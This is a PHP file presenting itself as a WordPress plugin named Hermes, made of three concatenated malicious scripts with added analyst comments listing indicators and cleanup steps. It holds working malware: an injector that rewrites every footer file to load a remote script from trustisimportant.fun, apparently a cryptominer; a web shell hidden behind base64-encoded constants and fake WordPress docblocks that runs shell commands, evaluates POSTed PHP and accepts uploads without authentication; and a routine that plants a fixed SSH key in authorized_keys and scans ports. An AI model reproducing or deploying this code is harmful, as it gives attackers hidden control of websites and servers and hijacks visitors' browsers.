<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/

// NOTE(review): analyst summary of this capture. The file is three PHP scripts
// concatenated back to back; the first two repeat the same plugin header.
//   1. Footer injector, gated on the `able` query parameter: rewrites every
//      footer.php / footer.tpl under the document root to load a remote script.
//   2. Web shell, gated on an obfuscated query parameter: command execution via
//      popen(), eval() of POST data, and unrestricted file upload.
//   3. SSH persistence, gated on the `check` query parameter: appends a fixed
//      public key to the PHP user's authorized_keys, then looks for SSH ports.
// None of the three entry points checks authentication, capabilities or a nonce.
//
// Indicators visible in this file that are worth hunting for on a suspect host:
//   - footer.php / footer.tpl containing the element id 'backup-jss' or the
//     trustisimportant.fun script URL;
//   - the ssh-rsa key below in ~/.ssh/authorized_keys of the web server user;
//   - access-log entries carrying the `able` or `check` parameters, or the
//     reversed INSTALLATION_KEY value as a parameter name;
//   - response bodies containing ---u---, ---ip---, ---p--- or the BASE64_TITLE
//     banner;
//   - outbound HTTP to checkip.dyndns.org followed by a burst of TCP connects
//     from the PHP worker to the host's own address.

if(isset($_GET["able"])) {
    // Define the text you want to add before the </body> tag
    // NOTE(review): the injected snippet loads karma.js from a third-party domain and,
    // once loaded, calls EverythingIsLife(<key>, 'web', 50). The call shape (site key,
    // label, numeric throttle) looks like an in-browser cryptominer loader; that is
    // inferred, since the remote script itself is not part of this page.
    $newText = "<script>(function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)){ return; } js = d.createElement(s); js.id = id; js.onload = function(){ EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50); }; js.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'backup-jss')); </script>";

    // Define the directory where your footer files reside (webroot)
    $directory = $_SERVER['DOCUMENT_ROOT'];

    // The key string doubles as the "already injected" marker searched for below.
    $searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu";

    // Array of file names to target
    $fileNames = array('footer.tpl', 'footer.php');

    // Maximum depth to traverse
    $maxDepth = 7;

    // Recursive function to search directories
    // Walks $directory with scandir(), recursing into subdirectories until $depth
    // exceeds $maxDepth, and rewrites every file whose name is in $fileNames.
    // Reads its configuration through `global`, so it depends on the variables above.
    function searchDirectories($directory, $depth) {
        global $fileNames, $newText, $maxDepth, $searchText;

        if ($depth > $maxDepth) {
            return;
        }

        $files = scandir($directory);

        foreach ($files as $file) {
            if ($file == '.' || $file == '..') {
                continue;
            }

            $filePath = $directory . '/' . $file;

            if (is_dir($filePath)) {
                searchDirectories($filePath, $depth + 1);
            } else {
                if (in_array($file, $fileNames)) {
                    $content = file_get_contents($filePath);

                    if ($file == 'footer.php') {
                        // Check if footer.php contains the specific text pattern
                        if (strpos($content, $searchText) == false) {
                            // Check if footer.php contains </body> tag
                            if (strpos($content, '</body>') !== false) {
                                // Add text above </body> tag
                                $content = str_replace('</body>', $newText . '</body>', $content);
                            }
                        }
                    } else {
                        // Add text at the top for footer.tpl
                        if (strpos($content, $searchText) == false) {
                            $content = $newText . $content;
                        }
                    }

                    // Write the modified content back to the file
                    // NOTE(review): the write and the echo run for every matching file,
                    // whether or not $content changed. During triage a fresh mtime on a
                    // footer file therefore does not prove injection, and the echoed
                    // message does not either; compare file contents instead.
                    file_put_contents($filePath, $content);
                    echo "Text added to the top of: $directory/$file <br>";
                }
            }
        }
    }

    // Start searching directories
    searchDirectories($directory, 0);

    echo "Operation completed.";

    // NOTE(review): the self-delete step below is commented out in this capture, so
    // the injector stays on disk after it has run.
    // // Get the current script filename
    // $scriptFilename = __FILE__;
    //
    // // Attempt to delete the file
    // if (unlink($scriptFilename)) {
    //     echo "Script '$scriptFilename' has been deleted successfully.";
    // } else {
    //     echo "Failed to delete script '$scriptFilename'.";
    // }
}
?>
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/

// NOTE(review): the constant names below are camouflage. Each value is plain base64
// and none of them is a key or a theme setting. Decoded:
//   INSTALLATION_KEY  -> "4cx0" (reversed with strrev() further down to give the
//                        query-parameter name that gates the shell)
//   AUTHOR_KEY, HOST_KEY, THEMES_SELECTION, THEMES_INSTALL
//                     -> the pieces of an HTML POST form with a text field named
//                        "command"
//   DEFAULT_THEMES, PATH_THEMES -> "command" (the POST field name)
//   BASE64_THEMES     -> "pwd"
//   BASE64_TITLE      -> "Xx_hermes_xX" plus a newline (banner printed first)
//   UPLOAD_THEMES_1-4 -> echoed back to back, an HTML multipart upload form whose
//                        file field is named "uploaded_file"
//   EVALUATION_TITLE  -> "evaluate" (the POST field name)
//   EVALUATION_THEME  -> an HTML POST form with a text field named "evaluate"
// Because the strings are base64-wrapped, signatures that look for literal
// "<form" or "command" text will not match this file; match on the encoded
// values or on the popen()/eval() sinks instead.
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU='));
define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+'));

// NOTE(review): the WordPress-style docblocks in this script do not describe the
// code next to them (no WP_Customize_Setting subclass, action hook or theme loader
// is present); they read as filler meant to make the file look like core code.
/**
 * Customize Setting to represent a nav_menu.
 *
 * Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
 * the IDs for the nav_menu_items associated with the nav menu.
 *
 * @since 4.3.0
 *
 * @see WP_Customize_Setting
 */
$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
// The gate parameter name is the reversed INSTALLATION_KEY value.
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
$wp_evaluation= EVALUATION_TITLE;

// The presence of the gate parameter is the only access check on the shell.
if(isset($_GET[$wp_body])){
    /**
     * Fires before the Site Activation page is loaded.
     *
     * Fires on the {@see 'wp_head'} action.
     *
     * @since 3.0.0
     */
    echo BASE64_TITLE;
    echo AUTHOR_KEY;
    echo HOST_KEY;
    echo THEMES_SELECTION;
    echo THEMES_INSTALL;
    echo EVALUATION_THEME;
    echo UPLOAD_THEMES_1;
    echo UPLOAD_THEMES_2;
    echo UPLOAD_THEMES_3;
    echo UPLOAD_THEMES_4;

    // NOTE(review): upload sink. basename() strips directories, but the extension and
    // content are not restricted, and the destination is a bare relative name, so
    // files land in the process working directory. When cleaning up, list that
    // directory for files that do not belong to the plugin.
    // The line break inside the string literal below is as it appears in this capture.
    if(!empty($_FILES["uploaded_file"])){
        $path = basename( $_FILES["uploaded_file"]["name"]);
        if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
            echo "The file ". basename( $_FILES["uploaded_file"]["name"])." 
has been uploaded";}
        else{
            echo "There was an error uploading the file, please try again!";}}

    // NOTE(review): command-execution sinks. Request data is passed straight to
    // popen(), and a single fread() of up to 4096 bytes of output is echoed back
    // unescaped. The POST field takes precedence over the GET gate value.
    if(isset($_POST[$wp_default])){
        $wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096);
        echo"<pre>$wp_themes_install</pre>";}
    elseif($_GET[$wp_body]!==""){
        $wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096);
        echo"<pre>$wp_themes_install</pre>";}

    // Every response also carries the output of the fixed BASE64_THEMES command.
    $wp_themes_install=fread(popen($wp_builder, "r"), 4096);
    echo"<pre>pwd: $wp_themes_install</pre>";

    // NOTE(review): eval() on raw POST data, i.e. arbitrary PHP execution in the web
    // server's context. Listing popen and eval-capable paths in disable_functions
    // does not cover eval (it is a language construct), so removal of the file is
    // the fix, not hardening around it.
    if(isset($_POST[$wp_evaluation])){
        echo "<pre> Evaluation: ";
        echo(eval ($_POST[$wp_evaluation]));
        echo("</pre>");
    }
    // Stops the request here so the surrounding page is never rendered.
    exit;
}
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
?>
<?php
// Returns [username, home directory, login shell] for the account the PHP
// process runs as. Environment variables are the first source; when the posix
// extension is available its passwd entry for the effective UID overrides the
// home directory and shell.
function getCurrentUserDetails(){
    $output=[];

    // Get the username of the user running the script
    $username = get_current_user();

    // Attempt to get the user's home directory
    $homeDirectory = getenv('HOME') ?: 'N/A';

    // Attempt to get the user's login shell
    $loginShell = getenv('SHELL') ?: 'N/A';

    // If posix functions are available, use them for additional information
    if (function_exists('posix_getpwuid')) {
        $userInfo = posix_getpwuid(posix_geteuid());
        if ($userInfo) {
            $homeDirectory = $userInfo['dir'];
            $loginShell = $userInfo['shell'];
        }
    }

    $output = [$username,$homeDirectory,$loginShell];
    return $output;
}

// Function to scan multiple ports concurrently using non-blocking I/O
// Opens up to $concurrency asynchronous TCP connections at a time to $ip, reads up
// to 1024 bytes from each stream that becomes readable, and records the port when
// the data contains "SSH" (case-insensitive). Returns the list of such ports and
// echoes each one wrapped in ---p--- markers.
// NOTE(review): connection warnings are suppressed with @, so failures leave no
// PHP error-log trace; network telemetry is the place to look for this sweep.
function fastNonBlockingPortScan($ip, $startPort = 1, $endPort = 65535, $timeout = 2, $concurrency = 100) {
    $sshPorts = []; // Array to store open SSH ports
    $connections = [];
    $portQueue = range($startPort, $endPort);

    while (!empty($portQueue) || !empty($connections)) {
        // Initialize connections up to the concurrency limit
        while (count($connections) < $concurrency && !empty($portQueue)) {
            $port = array_shift($portQueue);
            $connection = @stream_socket_client("tcp://$ip:$port", $errno, $errstr, $timeout, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);

            if ($connection) {
                stream_set_blocking($connection, false);
                $connections[$port] = $connection;
            }
        }

        if (empty($connections)) {
            break;
        }

        // Use stream_select to wait for any of the streams to become readable
        $read = $connections;
        $write = null;
        $except = null;
        $ready = stream_select($read, $write, $except, $timeout);

        if ($ready > 0) {
            foreach ($read as $port => $connection) {
                $banner = fread($connection, 1024);
                fclose($connection);
                unset($connections[$port]);

                if (stripos($banner, 'SSH') !== false) {
                    echo "---p---$port---p---\n";
                    $sshPorts[] = $port; // Add the port to the SSH ports array
                }
            }
        } else {
            // Timeout or no ready connections, close all and break
            // The whole scan ends here, including ports still waiting in the queue.
            foreach ($connections as $connection) {
                fclose($connection);
            }
            break;
        }
    }
    //echo "after break";
    return $sshPorts;
}

// Appends $content plus PHP_EOL to $filename unless the file already contains
// $content. Returns true when the content is present or was written, false when
// the file could not be opened or written.
function appendIfNotExists($filename, $content) {
    // Check if the file exists
    if (file_exists($filename)) {
        // Read the entire file content
        $fileContent = file_get_contents($filename);

        // Check if the content is already in the file
        if (strpos($fileContent, $content) !== false) {
            return true; // Content already exists, nothing to append
        }
    }

    // Open the file for appending (create if it does not exist)
    $fileHandle = fopen($filename, 'a');

    // Check if the file was opened successfully
    if ($fileHandle === false) {
        return false;
    }

    // Write the content to the file
    $result = fwrite($fileHandle, $content . PHP_EOL);

    // Close the file
    fclose($fileHandle);

    // Check if writing was successful
    if ($result === false) {
        return false;
    }

    return true;
}

// Fallback definition of str_contains() for runtimes that do not provide it.
if (!function_exists('str_contains')) {
    function str_contains (string $haystack, string $needle) {
        return empty($needle) || strpos($haystack, $needle) !== false;
    }
}

// Pulls the address out of a "Current IP Address: x.x.x.x" response body.
function extractIpAddress($html) {
    // Define a regex pattern to match the IP address
    $pattern = '/Current IP Address:\s*([\d\.]+)/';

    // Perform the regex match
    if (preg_match($pattern, $html, $matches)) {
        return $matches[1]; // Return the matched IP address
    }

    return ""; // Return an empty string if no IP address was found
}

// Asks checkip.dyndns.org over plain HTTP for the host's public address and returns
// it, or "" when the response does not match the expected pattern.
// NOTE(review): an outbound request to this hostname from a web server's PHP worker
// is a usable network indicator for this sample.
function getIp(){
    $ch = curl_init ();

    // set URL and other appropriate options
    curl_setopt ($ch, CURLOPT_URL, "http://checkip.dyndns.org");
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);

    // fetch the page and extract the address from the returned body
    $ip = extractIpAddress(curl_exec ($ch));

    // close cURL resource, and free up system resources
    curl_close ($ch);

    return $ip;
}

// Persistence routine. Runs only when the PHP user's login shell does not contain
// "/noshell", "/bin/false" or "/nologin", i.e. when the account looks able to log
// in interactively.
function startChecks(){
    $userNameDetails = getCurrentUserDetails();
    if ( (str_contains($userNameDetails[2],"/noshell") || str_contains($userNameDetails[2],"/bin/false") || str_contains($userNameDetails[2],"/nologin") ) == false){
        // NOTE(review): creates ~/.ssh if needed and appends a fixed public key to
        // authorized_keys with the permissions sshd expects. Deleting the plugin
        // does not remove this access: the key line must be removed from
        // authorized_keys of the web server account, and SSH logins for that
        // account reviewed, as part of cleanup.
        $folderPath = "$userNameDetails[1]/.ssh";
        mkdir("$folderPath");
        chmod("$folderPath", 0700);
        appendIfNotExists("$folderPath/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0h1Jw1strFMQhp8USGkQ9eIoF1uox+kuH6Nit4o9lgREU/XrakRAJW4HL/nj/StKHCbm5OBitXjCquTgwOCmMR40M5r7cmvZxwgxnEDzvnIXjE8XmNQfDBensgv+BjIk4KnZSEeuOp4iWX7Wy7DpLe/OI/OL8c3QlqBW5CMOoyi7cd9c/bnHpOqro4mGmDX54tD0j2yKjKgfUkIn1Hm3aoetTMUwxj65M4IlRk4DJpYS/gx7LVcHNV1G7VFkQohCNQcH976X/+/Tl3t2J+ONDwrHVrIJw44E9EIE4RLe3gzLe5zXf4wF1FmxVRzvLCezGDBIbHDlUiJ02WUFuborDsB0au0Xi1fhIiVXSRqmsXhYy/pToiwIPgFNBlQqzeXga070Ya20kHw+Tc60+z3mJLVTYTTaFBHDjHWKXWGG/EzkRwm6esE3FPkaSAop47E3t9Nfds6MO14C//+8i48cY5wbqR5HqywmZ0E0ke7eJtBNEk7YVwIk4JQ9ZthWvYq0=");
        chmod("$folderPath/authorized_keys",0600);

        // Example usage
        // The ---u---, ---ip--- and ---p--- wrappers make the response easy to parse
        // by a script; presumably an automated client collects them (not shown here).
        echo "---u---$userNameDetails[0]---u---\n";

        // Replace with your server's IP address
        // create a new cURL resource
        $targetIP = getIP();
        if ($targetIP == ""){
            $targetIP = "127.0.0.1";
        }
        echo "---ip---$targetIP---ip---\n";

        // The scan targets the host's own public address (or loopback as fallback).
        $startPort = 1;
        $endPort = 65535; // Scanning all ports up to 65535
        $concurrency = 250; // Number of concurrent connections

        $sshPorts = fastNonBlockingPortScan($targetIP, $startPort, $endPort, 2, $concurrency);
    }
}

// Entry point for the persistence routine: any request carrying `check` runs it.
if(isset($_GET["check"])){
    startChecks();
}
?>